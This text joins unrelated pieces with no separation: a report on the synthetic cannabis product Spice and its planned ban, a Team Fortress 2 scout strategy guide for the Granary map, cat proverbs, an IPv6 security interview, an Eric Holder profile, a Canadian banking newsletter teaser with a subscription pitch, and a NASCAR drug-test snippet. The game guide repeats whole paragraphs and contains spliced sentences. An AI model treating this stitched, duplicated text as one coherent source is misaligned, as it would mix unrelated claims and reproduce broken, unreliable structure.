Spice Gold has been around since 2006 , when it was first imported from China .
The smoking mixture costs £ 20 for a 3 gram pouch , and contains mostly unidentified herbal matter , with ingredients such as dried flowers , leaves and aroma extracts listed on the packet .
It is sold in various " flavours " , with Arctic , Diamond and Silver promising different strengths .
The Trojan Horse properties of Spice were only identified last December , by the THC Pharm laboratory in Germany , which is developing medicinal cannabis .
The research led to a ban in Germany and Austria in January this year .
France followed suit in February .
Martin Barnes , the chief executive of the drugs information charity DrugScope , said making Spice products illegal would be a " pre-emptive measure " , although the limited available research did suggest there were " potential harms " attached to their use .
" Exploring control options for the substances could remove the incentive for the manufacture and supply of Spice , as it would no longer be available as a ' legal ' alternative to cannabis , " said Barnes .
" While consistent with the aims of the Misuse of Drugs Act , a recommendation to make Spice illegal would be a pre-emptive measure and unusual in that it would be based on evidence of potential harms to individuals and society rather than proven actual harms . "
Professor Leslie Iverson , chairman of the ACMD committeethat drew up the report on Spice , stated his concerns : " It 's a very clever product , sold as a herbal smoking mixture from China , but containing chemicals which can be a lot more potent than cannabis , " he told his local paper , the Oxford Mail .
" Users have no idea what they are taking .
As a result , they are running a considerable risk of overdosing , which is not only unpleasant but potentially quite dangerous . "
It is expected that the ACMD will move on , after tackling Spice , to consider the position of other " legal highs " including Salvia divinorum , commonly known as magic mint or Mexican sage .
An official consultation over plans to ban two synthetic party drugs , GBL and BZP – also known as " herbal ecstasy " – is due to end on Thursday .
How to Think About Playing Granary *
I feel that scouts have much less control in Granary , as compared to say Badlands .
The flow of the map is very staggered , with teams holding in particular areas before they are ready to push through narrow chokes .
When these pushes occur it is naturally the heavy classes that go first through the narrow entranceways , with their medic behind them .
Because of the nature of this map being as it is , I feel it causes lots of scouts to feel though they play awkwardly on it .
Tag along behind the heavy classes as they move from CP3 to CP4 , or to push onto CP5 .
All the while looking out for them with thoughts such as : ' They are pushing on the right with uber , theres not much I can do , but I can watch their back to make sure no scouts come behind . '
Or perhaps : ' they are pushing on the right , and the left is totally open ; I should go and check the left to make sure we do n't get flanked , making sure to play defnensive so to stay alive ' ( see screenshot for pushing CP4 ) .
I think a lot of scouts are lost on granary for what to do , and part of this problem is thinking they need to be doing something when actually there is nothing valuable they can do .
Watch this clip of ( 5:20 – 6:20 ) of Stefan .
This is a perfect example of what I have been discussing .
Sometimes the best choice is to do nothing .
Do n't constantly peek .
What do you expect to see ?
A freaking alien invasion ?
There are six players out there in some combination of the nine classes of TF2 : rest in peace in this knowledge ( no aliens ) .
as stay alive while you 're useless , and good oppertunities will open themselves to you .
This is exactly what happens in that clip .
Notice how much time he spends not doing anything .
When I saw this play here for the first time it made me so happy , I need to see more scouts chilling out and taking stock of the game and less of the hyperactive non stop running about .
This example illustrates my post ' Sometimes You 're Useless ' , which could be crudely summed up .
This is exactly what happens in that clip .
Notice how much time he spendsWhen I saw this play here for the first time it made me so happy , I need to see more scouts chilling out and taking stock of the game and less of the hyperactive non stop running about .
Middle Point
A general point to remember for granary mid point is that there is a lot of movement potential to be taken advantage of .
The area is very multi-layered , with ledges on the crates and the ramps at the back etc .
As a scout these can be difficult to use effectively , but when utilised properly they can be used to great effect .
Defensive Top
Often it is best to wait a second to see if he will do this .
Once up on the ramp stay there ; do n't move on to the crates yet .
Wait for some of the initial spam which is inevitably thrown about right at the start , and watch to see what the enemy players are doing .
Then , at the appropriate moment , react to what you see .
It should also be noted you are in a good position to call any important information to your team .
So , what kind of things might you see and then how would you react to them ?
It 's a difficult task to try and outline and describe this as every mid point fight will be unique .
I will do my best to describe some general scenarios you may encounter and suggest some viable decisions to make against them .
The first way I 'm going to suggest to approach the middle point is to play defensive top .
Push up to the doorway which leads to your ramp on mid .
Be careful when moving through the opening as many demomen will be there early and place a sticky anticipating your arrival .
Often it is best to wait a second to see if he will do this .
Once up on the ramp stay there ; do n't move on to the crates yet .
Wait for some of the initial spam which is inevitably thrown about right at the start , and watch to see what the enemy players are doing .
Then , at the appropriate moment , react to what you see .
It should also be noted you are in a good position to call any important information to your team .
So , what kind of things might you see and then how would you react to them ?
It 's a difficult task to try and outline and describe this as every mid point fight will be unique .
I will do my best to describe some general scenarios you may encounter and suggest some viable decisions to make against them .
One scenario you may encounter is a scout pushing hard right side ( left from his perspective ) and runs past the garage door , pressuring the demo or whoever is by the health pack .
Your first reaction will obviously be to call it ; then whether or not you decide to drop down will have to be somewhat situational .
Your presence and shots from above may be enough to keep him back and prevent him from going to aggressive on your demo or whoever is there .
If not , and he is set on rushing hard on some suicide mission , then you might want to drop down .
Alternate agressive stances by the enemy scout (s ) could be through the crates or straight across the point .
Dropping down may seem like a natural decision , but I do n't think it is always the best option , it may allow soldiers up on the crates to fire rockets down on you for example .
A better decision might be to use that moment , where at least one enemy player is clearly occupied doing other things , to create some pressure and distraction of your own in any gaps you may see .
For example the second you drop down a soldier may jump up to your teams left crate .
If you are on the floor there you are vulnerable and not very helpful .
If you stay up then you can start attacking the Soldier , often he will be intent on going for your Medic , giving you time to get a free meat shot and take him down as fast as possible .
If one scout is top what about the other guy ?
It is fine to play both scouts top at the start .
However , you do n't want two scouts being overly defensive .
If there are two of you up then decide which one of you will drop down more easily .
If a scout does decide to rush across the point , in this scenario one if you will want to drop toward him .
One top one bottom right
Another option is to play the other scout defensive bottom right .
This has the advantage of freeing the scout who plays up top .
If both of you are up top then , as I already said , one of you should be designated to be the one to drop and deal with scouts .
Playing the other scout bottom has the advantage of one scout beintg natually in position .
Playing bottom right you want to peek along the right side as soon as possible , be very careful as often one scout will come along here and you will be in a 1v1 situation .
If this happens do not try and 1v1 unless you get a 100 + damage meatshot almost instantly and have a chance to finish him very quickly .
The reason you dont want to stay in 1v1 is that the soldiers will likely be arriving any second .
Peeking right will allow you to see if a scout is coming that way , he may be attempting to push right into you , or go between the gap in the crates .
If he tries to push into you then fall back into your garage and play very defensively from in there .
If he goes between the crates do n't chase him , back up and move left toward the point to deal with him there .
The big danger playing bottom right is the soldier that will likely go on the crate just above you .
So long as there is a soldier there you are very locked in position .
Your presence in the garage should still prevent any players from running along that right hand side toward your team , so you still retain limited usefulness .
You want to get out as soon as it is safe to do so , however , and start doing some damage and gaining presence / position .
To Recap Dropping down may seem like a natural decision , but I do n't think it is always the best option , it may allow soldiers up on the crates to fire rockets down on you for example .
A better decision might be to use that moment , where at least one enemy player is clearly occupied doing other things , to create some pressure and distraction of your own in any gaps you may see .
For example the second you drop down a soldier may jump up to your teams left crate .
If you are on the floor there you are vulnerable and not very helpful .
If you stay up then you can start attacking the Soldier , often he will be intent on going for your Medic , giving you time to get a free meat shot and take him down as fast as possible .
It is fine to play both scouts top at the start .
However , you do n't want two scouts being overly defensive .
If there are two of you up then decide which one of you will drop down more easily .
If a scout does decide to rush across the point , in this scenario one if you will want to drop toward him .
Another option is to play the other scout defensive bottom right .
This has the advantage of freeing the scout who plays up top .
If both of you are up top then , as I already said , one of you should be designated to be the one to drop and deal with scouts .
Playing the other scout bottom has the advantage of one scout beintg natually in position .
Playing bottom right you want to peek along the right side as soon as possible , be very careful as often one scout will come along here and you will be in a 1v1 situation .
If this happens do not try and 1v1 unless you get a 100 + damage meatshot almost instantly and have a chance to finish him very quickly .
The reason you dont want to stay in 1v1 is that the soldiers will likely be arriving any second .
Peeking right will allow you to see if a scout is coming that way , he may be attempting to push right into you , or go between the gap in the crates .
If he tries to push into you then fall back into your garage and play very defensively from in there .
If he goes between the crates do n't chase him , back up and move left toward the point to deal with him there .
The big danger playing bottom right is the soldier that will likely go on the crate just above you .
So long as there is a soldier there you are very locked in position .
Your presence in the garage should still prevent any players from running along that right hand side toward your team , so you still retain limited usefulness .
You want to get out as soon as it is safe to do so , however , and start doing some damage and gaining presence / position .
So unless a big opportunity presents itself for you to go aggressive ( hard call to make ) , you do n't want to be pushing but waiting for opportunities to present themselves and blocking up any chinks in your own teams positioning .
If you 're going up top there are plenty of plays for your other scout .
Both of you can go up top , this is perfectly viable though you need to be careful that you are n't too passive : you can sit back but at least one of you is going to need to get forward , going on the front left crate for example .
One last option I will suggest is for the other scout is to go aggressive on the enemy demo .
He needs to be going bottom ( not top ramp ) for this to work .
There is a brief moment at the start of the round where the demo arrives before the soldiers and medic , getting one or two good shots on him to make him low can be decisive in winning a mid point , preventing demo aggression and allowing your heavies to take positions .
Be careful of the enemy scouts who will try to defend their demo , and as always be careful of enemy scouts rushing your own demo .
Pushing the Left
It has the advantage however of being very positionally strong if you can avoid damage , putting you in a place to be able to dish damage to anyone who wants to come close .
Playing on the left can also be done by going straight on point first and then moving left as was played in the short clip by Bybben .
A big danger here is if the heavies decide to push this way ( right from their perspective ) , in which case you 're in a precarious position .
As long as you 're quick you should be able to spot this in time to back off , and then perhaps go between the gap in the crates and on to the point .
The disadvantage of being on the point is that it leaves you very exposed . , putting you in a place to be able to dish damage to anyone who wants to come close .
Playing on the left can also be done by going straight on point first and then moving left as was played in the short clip by Bybben .
A cat is a lion in a jungle of small bushes .
Photo by tanakawho
2 . It is better to feed one cat than many mice .
3 . Happy owner , happy cat .
Indifferent owner , reclusive cat . - 4 . A cat is a lion in a jungle of small bushes .
5 . A rose has thorns , a cat has claws ; certainly both are worth the risk .
- 6 . The cat has nine lives - three for playing , three for straying , and three for staying .
7 .
You will always be lucky if you know how to make friends with strange cats .
8 .
If you want to know the character of a man , find out what his cat thinks of him . - 9 . When the cat is away the mice will play .
- 10 .
Every life should have nine cats .
- 11 .
After dark all cats are leopards .
- 12 .
If you stared deep into a cat 's eyes , you would be able to see into the world of spirits .
13 .
He is as quiet as a cat .
14 .
The dog may be wonderful prose , but only the cat is poetry .
- 15 .
It is better to be a mouse in a cat 's mouth than a man in a lawyer 's hands .
- See more Cat Proverbs and Sayings
Does moving to IP v6 solve the security ills of the IP v4 world , and will organizations need to throw out their existing security products once they 've transitioned ?
Linda Leung talks with Scott Hogg and Eric Vyncke about these and other IP v6 security issues .

Many people are familiar with the near - depletion of IP v4 addresses and the move to IPv6 , which will free up more IP addresses for enterprises and service providers to give to new applications and devices .
But the move to the new protocol opens many questions about security .
Does moving to IP v6 solve the security ills of the IP v4 world , and will organizations need to throw out their existing security products once they 've transitioned ?
I asked quizzed security experts and co-authors of IPv6 Security , Scott Hogg and Eric Vyncke , about these and other IP v6 security issues ahead of Cisco Live in San Francisco .
Scott Hogg , CCIE , is the director of advanced technology services at GTRI and is responsible for setting the technical direction for GTRI and helping the company create service offerings in emerging technologies such as IPv6 .
Eric Vyncke works as a distinguished consulting engineer for Cisco Systems as a technical consultant for security covering the whole Europe .
His area of expertise for 20 years is mainly security from Layer 2 to applications .
Linda Leung :
Your book explains why IPv6 is already a latent threat in IP v4 - only networks .
That 's a disturbing thought .
How is IP v6 already a threat ?
Scott Hogg :
It has to do with the fact that many operating system manufacturers have helped aid the migration to IP v6 by including it in their OSes by default .
These dual - stack operating systems perform DNS lookups , and if they get back both an IPv4 and an IP v6 address in their query they will actually prefer to communicate using IP v6 if they have the option .
Most users do n't realize that this capability is turned on by default and that this preference exists .
Furthermore OSes like Microsoft XP , Vista , and Windows 7 will help the user establish IPv6 Internet access by dynamically creating tunnels where the IP v6 traffic will be encapsulated in IP v4 protocols to pre-determined points on the Internet .
The issue is that if an organization was n't aware of this fact , then they may actually be communicating with the Internet using IP v6 and not even realize it .
These organizations probably have n't considered the security implications of this or taken any action to secure this communication in the same ways they secure their IP v4 traffic .
Eric Vyncke : Moreover , those OSes have the IP v6 protocol ready to be used : all it takes is a single IP v6 packet sent by a Layer 2 adjacent attacker pretending to be an IP v6 router .
Therefore , an attacker can enable IP v6 on those OSes , and if the computer is not protected by a firewall against attacks over IPv6 and if the computer is vulnerable , then the attack will succeed .
LL : How does IP v6 improve on the security limitations of IPv4 ?
SH : The protocols are actually mutually exclusive , so IP v6 can't improve IP v4 security in any way .
However , by learning about IP v6 security concepts you can learn about the ways you should secure IPv4 .
Because many of the techniques are similar ( e.g. firewalls at the perimeter , access security , VPNs , and so on ) the same styles of protection mechanisms we use for IP v4 can also apply to how we will protect IP v6 communications .
EV : IPv6 has also benefited from security lessons learned from IPv4 .
For instance , the equivalent of Address Resolution Protocol ( ARP ) for IPv6 is called Neighbor Discovery Protocol ( NDP ) ; by default NDP has the same security issues as ARP , but there is a secure version of NDP ( called SeND ) which relies on cryptography to achieve security and is available in Cisco routers .
LL : Are people lulled into a false sense of security thinking that upgrading their networks to IP v6 would be the answer to their security ills ?
SH : Yes , IPv6 is a different protocol than IP v 4 so it has unique challenges .
IPv6 is different than IPv4 in the way that address autoconfiguration occurs .
Even though IP v4 has Address Resolution Protocol ( ARP ) and the security weaknesses in that protocol , the weaknesses in the Neighbor Discovery Protocol ( NDP ) are different so they require a new method of protection .
Many have the false impression that IPv6 is inherently more secure simply because it supports IPSec .
IPSec is required for every IP v6 node to support but it is not mandated that is be used .
IP v4 has IPSec capabilities , but they are not used for all connections .
EV : Agreed .
LL : What kinds of IP v6 attacks are out there ?
SH : The attacks that have gained the most popularity are in the access layer against Neighbor Discovery Protocol ( NDP ) and across the WAN or Internet using Routing Header 0 ( RH0 ) .
There are also attacks against the transition mechanisms themselves .
There is code available that anyone can download and compile to create tools that automate these attacks .
That is an indication that attackers are learning about IP v6 and starting to use it as IP v6 becomes more prevalent .
As IP v6 grows in usage it , will become a larger target .
For example , IPv6's weaknesses in its Neighbor Discovery Protocol ( NDP ) are similar to those in IPv4's Address Resolution Protocol ( ARP ) .
The security of these protocols is difficult because these protocols are essential for normal operation of the network .
These attacks presume that an attacker is on our internal LAN or has already compromised a computer on the LAN .
It is hard to defend against someone who already has access to your internal network .
There are protocols like Secure Neighbor Discovery ( SEND ) and a few manufacturers like Cisco have working implementation of this protocol .
EV : The IPv6 attacks that I have seen are mainly misconfigured computers sending wrong Router Advertisements ( a message normally sent by routers only ) and those messages confused the network .
The other attack over IP v6 that I have seen is an application - level attack ( such as SSH dictionary attack or SQL injection attack or email spam ) where the attacker was probably not even aware that he used IP v6 to transport the application attack .
LL : What are the security limitations of IPv6 and how should organizations protect against these vulnerabilities ?
Are they going to have to throw out their existing security tools for IP v6 - supported gear ?
SH : The IPv6 security vulnerabilities are at the access network , across the WAN and Internet .
Therefore organizations must use a diverse set of techniques to secure IPv6 .
As an organization deployed IPv6 on the LAN they should use mechanisms to secure neighbor discovery .
Tools like SEND , 802.1X , network - admission control ( NAC ) can be used to secure IP v6 access networks .
Organizations will need to secure their tunnels with Access Control Lists ( ACLs ) .
Firewalls and IPSes can be used to secure the perimeter .
These devices exist and are used today to secure IP v4 , so manufacturers just need to add IP v6 capabilities to their products if they did n't already .
Many of the utilities that organizations already use support both IP v4 and IPv6 .
It may be as simple as upgrading the software version and configuring the IP v6 protection measures .
Many firewalls support both protocols , albeit IP v6 support does n't have all the bells - and - whistles that IP v4 gets , but that gap is closing .
Organizations should not need to forklift - upgrade their security devices to gain IP v6 support .
EV : Indeed , most security devices ( firewall , intrusion prevention systems , VPN ) exist for IP v6 .
The same device can even protect both IP v4 and IP v6 at the same time .
It is also very important to apply the same security policy for IP v4 and IPv6 ( which is easier to achieve if the same device works for IP v4 and IPv6 ) .
If the policies are different in IPv4 and IPv6 , then the attackers will discover this difference and will obviously use the less strict security policy to attack your resources .
LL : During the transition process , is there any danger of security holes being exposed when organizations move from IP v4 to IPv6 ?
SH : Yes , during transition from IP v4 to IP v6 organizations will use a variety of transition mechanisms .
While dual - stack ( running both protocols simultaneously ) will be the preferred approach , there will be situations that require tunneling IP v6 in IP v4 packets to help IP v6 bridge across a portion of the network that is IPv4 - only .
Those transition mechanisms will be the focus of attackers , and organizations will need to secure those tunnel endpoints .
It depends on the organization 's IPv6 transition strategy , but organizations may want to completely disable transition techniques that they are not using .
The danger occurs when a transition technique like dynamic tunneling is being used without the user 's knowledge and they have n't considered the implications and are not protecting the IP v6 communications .
EV : : Agreed ; I have nothing to add .
LL : What should network professionals know about IP v6 security before embarking on a transition project ?
Are there security measures that organizations can take now even before they transition to IPv6 ?
SH : Network administrators should learn about the differences between IPv6 and IP v4 so they are prepared to adapt their security strategy to IPv6 .
Much of what they already know is applicable , but IP v6 has some nuances they should be aware of .
Once they have done this they are ready to secure IP v6 ahead of when they might be deploying it .
For example , an organization can disable all outbound IP v6 packets encapsulated in IP v4 packets and the dynamic tunneling techniques until such a point as they have determined if they are needed .
EV : While there are not a lot of differences between IPv4 and IPv6 , it is really important that security officers learn about IP v6 now and how IP v6 can affect their security posture now ( even in an IPv4 - only network ) .
LL : The level of deployment for IP v6 is not the same across the world .
For instance , it 's already in use in Europe and Asia and in the U.S. , ISPs are only now testing it .
I 'm guessing this is a kind of blessing for the U.S. since worms that usually travel across the world overnight may hit roadblocks traveling across different protocols ?
SH : IPv6 is growing in popularity internationally , and most ISPs have now recognized the importance of having IP v6 services ready for their customers .
Because the public and private IP v4 address space is densely populated , you can guess and IP address and it is probably being used .
That is how many of today 's worms operate .
Due to IPv6's increased address space , it is not possible to have a worm that randomly creates target addresses as a way of spreading .
You are correct in that an attack that leverages IP v 4 wo n't affect an IP v6 - only host ( and vice - versa ) , however , most hosts will run both IP v4 and IP v6 together .
Therefore , it would be possible for a worm to spread over IPv4 and then leverage IP v6 as a control channel .
EV : Also , several worms propagate over e-mail or instant messaging ; and as e-mail can be sent over IP v4 or IPv6 , this also means that existing worms will propagate over the IPv4 and IPv6 Internet without noticing any difference .
LL : Much of security today has to do with end - user education — teaching users not to open suspicious email attachments or fall for phishing pranks .
What are the measures that end users should take to protect themselves in an IP v6 world ?
SH : Since IPv4 and IPv6 are network - layer protocols , the applications that ride on top of them are the same .
Therefore , if a dual - protocol application has a vulnerability in its software , that vulnerability can be exploited over IP v4 or IPv6 .
During the period or transition , using dual - stack organizations will bear the burden of having to protect both protocols .
Unfortunately , spam , e-mail attachments , and malware - infected web sites will continue to exist in an IP v6 world .
The issue is that many of the content filtering protection measures we have today only look for this malware in IP v4 packets .
These products need to be looking for all these infected messages in both IP v4 and IP v6 packets .
EV : Exactly .
Spam and phishing emails are already being sent over IP v6 : this is completely transparent for the users and for the worm .
The education is also a key component of every security policy .
As Scott said , IP v6 is transparent for the end - user , so no need to educate them , but the network and security staff of enterprises and service providers must absolutely be trained about IPv6 NOW to understand the latent threats that we have just discussed .
LL : The development of Mobile IP v6 seems to have exposed more security issues than the development of IPv6 .
What are the security issues and how far have they been resolved in the latest standard ?
SH : Mobile IP v6 represents one of the protocols that leverage the unique characteristics in IPv6 to make the system operate much better than it did using IPv4 .
Mobile IP v6 is being looked at to streamline mobile communications , but it must be secure before it is widely deployed .
The standards specifications require that IPSec be used between the mobile node and the home agent .
Some Mobile IP v6 implementations do n't use IPSec to secure those control messages and that exposes a weakness .
The standard has defined how Mobile IPv6 can be secured using IPSec and the return routability procedure ; it is now up to implementers to use those techniques to secure Mobile IP v6 communications .
EV : Indeed , mobile IP v4 was not really the most secure and efficient protocol .
Mobile IPv6 was specified to avoid all shortcomings of mobile IP v4 , including security .
This means that mobile IP v6 is both efficient and secure ( even if not widely deployed ) .
LL : Let 's talk about Cisco and IPv6 .
Cisco IOS software have been integrated with IP v6 since May 2001 .
Have customers been using this facility , and if so , how ?
SH : When I started learning about IPv6 I would test using Cisco 2500 - series routers .
Back then the software worked for forwarding packets , but there were n't a lot of advanced features .
Now Cisco's IP v6 implementation in IOS is very comprehensive .
If you read the release notes for 12.2 ( 33 ) SXI on 6500s or 12.4T on their routers , it seems that more new IP v6 features are coming than IP v4 features .
Cisco has really put a lot of effort into their IP v6 implementations and it shows .
Up 'til now customers have been using Cisco 's IP v6 features in their test labs only .
Some customers are using those IP v6 features to proceed with dual - stack deployments in parts of their networks .
Customers can now feel confident that they have a set of IP v6 features in IOS that will allow them to deploy IP v6 with ease .
EV : The IPv6 stack in IOS is quite old indeed and has been tested by IP v6 users , notably universities , and in some service provider networks like NTT in Japan .
Cisco is currently in the process of changing the licensing scheme for IP v6 to make it completely free ; this means that if a customer buys an advanced services image for IOS , he will get exactly the same features ( if applicable of course ) in IP v4 or IPv6 .
This allows for a zero- cost deployment of IPv6 ( assuming that hardware does not need to be replaced or upgraded ) .
LL : Most of Cisco 's hardware is IPv6 - enabled .
How easy is it to transition to IP v6 with Cisco gear ?
What are the steps that customers should take ?
SH : Most of Cisco 's devices can forward IP v6 packets just as quickly as they can forward IP v4 packets .
There is n't the performance gap between the protocols that existed five to eight years ago .
It is simple to establish dual - protocol capabilities on a Cisco router or switch .
You just need to assign an IP v6 address to an interface and the protocol is immediately activated .
That interface will then have both an IP v4 and an IP v6 address .
At that point you can enable an IPv6 routing protocol ( RIPng , OSPFv3 , IS - IS , EIGRPv6 , or BGP ) and you are ready to forward packets across your network .
The next step would be to configure IPv6 DNS resource records on the DNS server to enable names to be used instead of lengthy IP v6 addresses .
At that point you are ready to enable dual - protocol applications and go on your way with the migration .
The migration to IP v6 does n't require much money , but it does take a little bit of time and effort .
I bet you would be surprised how easy it is if you tried it .
EV : The move to IPv6 in the network is really the easiest part , as Scott has just explained .
The most difficult part is to move applications to IPv6 , especially applications that directly manipulate or store IP addresses .
LL : Final question , what will you be doing at Cisco Live ?
SH : I have n't been to Cisco Live in many years , so I am looking forward to attending many of the sessions .
There are so many deeply technical sessions on a huge variety of technologies that my problem is deciding which sessions to attend .
I will be meeting old friends and meeting new people .
Eric on the other hand will be presenting on IPv6 Security like he has for several of the past years .
His session seems to draw more and more people each year .
EV : Besides presenting on IPv6 Security ( one version for enterprise and one version for service providers ) , I have also installed with some colleagues the first IP v6 network over Wi-Fi in Cisco Live .
Comcast has offered us IPv6 connectivity over a 1 Gbps optical fiber .
Linda Leung is an independent writer and editor in California .
Reach her at leungllh@gmail.com .
WASHINGTON , July 29 , 2009  -- Attorney General Eric Holder told ABC
News in an exclusive interview today that he is increasingly concerned about Americans becoming radicalized and turning to terrorism .
" I mean , that 's one of the things that 's particularly troubling :
This whole notion of radicalization of Americans , " Holder told ABC News during an interview in his SUV as his motorcade brought him from home to work .
" Leaving this country and going to different parts of the world and then coming back , all , again , in aim of doing harm to the American people , is a great concern . "
Holder said the ever - changing threat of terror and the pressure to keep up with it weighs heavily on his mind as he tries to ensure that the government has done all it can to anticipate the moves of an unpredictable enemy .
" In some ways it 's the most sobering part of the day , " Holder said of his morning intelligence briefing , in which he gets the latest report on the landscape of " the organizations , the people who are bound and determined to do harm to our nation . "
Recent events , such as the arrests of alleged members of a home - grown terror cell in North Carolina , the return of several Somali - American men to their home country under questionable circumstances and the filing of charges against a New York man who allegedly received al Qaeda training in Pakistan and took part in a rocket attack against U.S. forces , bring the threats to national security into sharp focus .
" But , you know , in the hierarchy of things , it 's hard to figure out how to prioritize these things in some ways , " he said .
" The constant scream of threats , the kind of things you have to be aware about , the whole notion of radicalization is something that did n't loom as large a few months ago ... as it does now .
And that 's the shifting nature of threats that keeps you up at night . "
He noted , however , that the Bush administration " left us an infrastructure that I think is very good , " and that national security officials are constantly striving to put the country in a safer position .
" The American people would be surprised by the depth of the threat , but also reassured to see the assets that have been deployed around the world , " Holder said , adding that the United States interacts closely with its foreign partners .
Critical Decisions on Guantanamo , Investigation Into Bush Administration Top Holder 's To - Do List
Yet , terrorism is just one of the major issues Holder has on his plate .
ABC
News spent the day with Holder , from a breakfast meeting on Capitol Hill , to his daily walk up the five flights of stairs to his office where he works as the nation 's top law enforcement official .
He 's just shy of six months into his job as the nation 's top cop , and has already been tasked with overseeing the closure of the detention facility at Guantanamo Bay , Cuba , dealt with the continuing fallout from some unpopular Bush administration policies and jumped headfirst into the issue of race relations in America .
As the summer races by , Holder faces a series of critical decisions .
The investigation into the Bush administration 's policy on the detention and interrogation of suspected terrorists , Holder said is still a real possibility -- regardless of the political fallout .
According to a recent ABC News / Washington Post poll , 54 percent of Americans oppose such an investigation .
" We want to move forward .
We do n't want to look back in that regard , " Holder said .
" My obligation as the head of the Justice Department is to make sure that the laws are followed and to the extent that we find that laws were broken , to hold people accountable .
" I think the department , at least some of the people who worked , simply lost their way , " he said , citing tactics like waterboarding , which he considers torture .
" I will follow the facts and the law wherever it takes me . "
Another issue weighing heavy on the attorney general is how best to shut down the detention camp at Guantanamo Bay .
" Guantanamo is a place that has served as a recruiting tool for those who want to do us harm , " he said .
Holder declined to say how many detainees could face trial in the United States , but said U.S. attorney offices around the country have been reviewing the cases for possible prosecution in those districts .
" At this point , a significant number have been referred to the Justice Department for possible prosecution and those cases have been referred out [ to ] four or five U.S. attorneys ' offices .
And they 're in the process right now of looking ... at where they can make cases against these individuals .
I do n't know what the number , the final number is going to be , " he said .
Holder also said some of the detainees could be held indefinitely .
" The possibility exists that there could be people who are held in a preventative way under the laws of war , " he said .
" If that happens , we 'd only do so by creating a system that had due process .
" I think that by closing Guantanamo , by prosecuting people , be it in Article III courts , or in military commissions , we will make the American people safer than they are now , " Holder continued .
Holder Stresses Justice Department Independence
On Wednesday , Holder met with Senate Judiciary Committee Chairman Patrick Leahy , whose panel has oversight over the Justice Department .
The Vermont senator said Holder 's job " is probably the toughest job there is , because it is the one part of the Cabinet where certainly you have to reflect the president , but you 've got to be independent . "
Leahy was highly critical of one of Holder 's predecessors , Alberto Gonzales , who resigned under fire for allowing political ideology infiltrate the Justice Department .
Gonzales had long been a friend and ally of George W. Bush , and critics said Gonzales operated the department as an arm of the White House .
Leahy acknowledged Holder 's close ties to President Obama , but said his approach to the department is more in line with that of Robert Kennedy , who served in his brother John F. Kennedy 's Cabinet .
Recalling a time when he met Attorney General Kennedy , Leahy said he was struck by his independence from the White House .
" Of course he was as loyal to the president as anybody could be .
He was the president 's closest advisor , most trusted person .
He was his brother .
But he was independent as attorney general , [ which ] is probably the best model for being attorney general , " Leahy said .
" I think Eric Holder fits that model . "
On the wall in Holder 's office at the Justice Department hang portraits of several past attorneys general -- Kennedy is one of them .
Holder told ABC News that Kennedy serves as an " inspiration " for many reasons , but one that hits close to home .
" He demonstrated , I think , real courage , real sense of this place during the early ' 60s .
I think about my late sister - in - law who integrated [ the ] University of Alabama , " Holder said .
His late sister - in - law , Vivian Malone Jones , was the first black graduate of the university .
" [ Alabama Gov. ] George Wallace [ was ] standing in the door , she was the young black student who was admitted on that day as a result of his [ Robert Kennedy 's ] efforts ; he pushed the Kennedy administration , I think , in the area of civil rights , he 's a legend in this building , " Holder said .
The main Justice Department building bears Robert Kennedy 's name .
Holder : ' Race is a Tough Issue '
Holder 's remarks in a February speech that the United States was " a nation of cowards " when it comes to race relations , spurred controversy .
Though he said he stands by his comments , the attorney general also said he believes the country has made progress along the lines of race .
Holder Says Gates Arrest Was a ' Teachable Moment '
" Race is a tough issue .
Wherever it has been found , whether in the United States or even in other countries , it 's an issue that has divided us , I think , in the past .
It 's an issue that if unaddressed , I think , can divide us in the future .
And what that speech was about , " Holder said .
On the fallout surrounding the recent arrest of Harvard University professor Henry Louis Gates Jr. , which has triggered a national uproar about the role of law enforcement and reignited a debate on race relations , Holder said he agreed with Obama , calling it a " teachable moment " for the nation to improve communication between different groups .
" Based on what I know of Professor Gates and what I 've heard about Sgt. [ James ]
Crowley , my guess is that they both think that they might have reacted , perhaps , a little differently and this situation might have -- might have been avoided , " Holder said .
Though he declined to take sides , Holder , the nation 's first African - American attorney general , said that as a young man , he , himself , had been profiled by police during a traffic stop -- an incident that left a lasting impression on him .
" I was a young college student driving from New York to Washington , stopped on a highway and told to open the trunk of my car , because the police officer told me he wanted to search it for weapons .
I was at a rest stop .
And , you know , I was a college kid .
I did n't know quite what my rights were , " Holder said .
" People walked by as I was opening this trunk and the officer was looking in there , " he said .
" And I remember , as I got back in the car and continued on my journey how humiliated I felt , how angry I got . "
Holder said that the incident has been an impetus for his work to counter racial profiling at the Justice Department and work toward establishing trust between communities .
And while law enforcement is far from being colorblind , he said that agency is pushing for change .
" I think we 've made a lot of progress in this country , " he said .
" We still have a ways to go .
But I 'm pretty confident that the America of the 21st century can be all that we want it to be . "
The Next Financial Fiasco
“ If you think Canada escaped the downward trend in U.S. banking , think again , ” Dan Amoss begins .
“ While the country may not have plunged headfirst into subprime mortgages , it did dip heavily into risky derivatives .
The leverage it took on generated impressive returns on equity in good times , but that same leverage is set to wipe out equity today .
“ Canada has just entered what will ultimately be an enormous credit loss cycle , and by the time it ’s over , the Canadian banks could easily lose their pristine reputations .
Until the middle of 2008 , Canada ’s economy was booming .
Its mining , energy and manufacturing sectors are world - class , and every other sector was pulled along for the ride .
“ But the wheels fell off last fall .
According to Statistics Canada , the unemployment rate rose to 8.4 % in May — the highest in 11 years .
Ontario , with its heavy manufacturing base and ties to the ‘ Detroit Three ’ auto companies , is especially hard hit ; Ontario lost 234,000 jobs , or 14 % of its entire manufacturing work force , since last October .
Ontario will lose even more jobs this summer as GM and Chrysler dramatically cut auto production .
Alberta has slowed dramatically too .
Just a year ago in Alberta , every skilled construction worker was working overtime on oil sands projects .
Now many projects are postponed and workers are getting laid off .
The unemployment rate in Alberta nearly doubled from May 2008 to May 2009 , to 6.6 % , and is heading higher .
“ For Canada , this credit cycle will probably be worse than the one in the late 1980s .
According to RBC Capital Markets , annualized loan loss provisions for the entire Canadian banking system peaked at 2.88 % of all loans in 1988 .
As of April 2009 , this figure was just 0.77 % .
Over the next year or two , loan loss provisions should easily triple or quadruple , which would cut deeply into profits and capital . ”
Dan just told his Strategic Short Report readers about one “ safe ” ( and very well - known ) Canadian bank on the verge of a solvency crisis .
Get the ticker by subscribing , here .
And do n’t forget , today is the last day you can join Strategic Short Report for 50 % off .
Jeremy Mayfield did n't spare his stepmother or NASCAR while defending himself against Wednesday 's report that he again has tested positive for methamphetamines .
NASCAR filed court papers on Wednesday that said his most recent drug test came back positive , and included an affidavit from Mayfield 's stepmother , Lisa , who claims to have seen the driver using drugs on numerous occasions .
Mayfield said he does not trust NASCAR testing and saved his strongest words for his stepmother .
